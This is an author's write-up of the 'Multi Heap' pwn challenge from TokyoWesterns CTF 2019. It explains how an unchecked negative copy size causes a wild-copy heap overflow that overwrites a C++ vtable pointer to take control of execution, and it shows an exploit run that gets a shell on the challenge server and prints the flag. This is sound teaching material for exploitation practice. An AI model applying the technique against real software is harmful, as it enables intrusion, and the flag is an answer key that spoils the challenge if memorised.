Multi Heap
from TokyoWesterns CTF 2019
配布物
- multi_heap
- libc.so.6
intended solution
My intended solution use an exploitation technique as known as wild copy. wild copy was proposed by Google Project Zero. Original blog post is here.
You can input negative integer as a size for copy function because of no checking for it. A memory copy that the copy size is negative become huge heap overflow and cause a segmentation fault. If you can use some data on memory before causing the segmentation fault, this heap overflow can be used for exploit. This challenge was written by C++, so there is a pointer of vtable on heap segment. You can overwrite the pointer by wild copy then control rip.
Of course, I heard that unintended solution exists. I didn't notice that, so some teams who found and used it are awesome and smart.
% python exploit.py r
[*] '/Users/hama/ctf/making/multi-heap/multi_heap'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[+] Opening connection to multiheap.chal.ctf.westerns.tokyo on port 10001: Done
[*] Pwning
[*] libc_base: 0x7f5700fd3000
[*] heap_base: 0x55cd53c44000
[*] Switching to interactive mode
: $ ls
flag
multi_heap
$ cat flag
TWCTF{mulmulmulmultititi}
md5
# md5sum ./multi_heap (git)-[master]
6066b86031b6f286642c231b504c4d1c ./multi_heap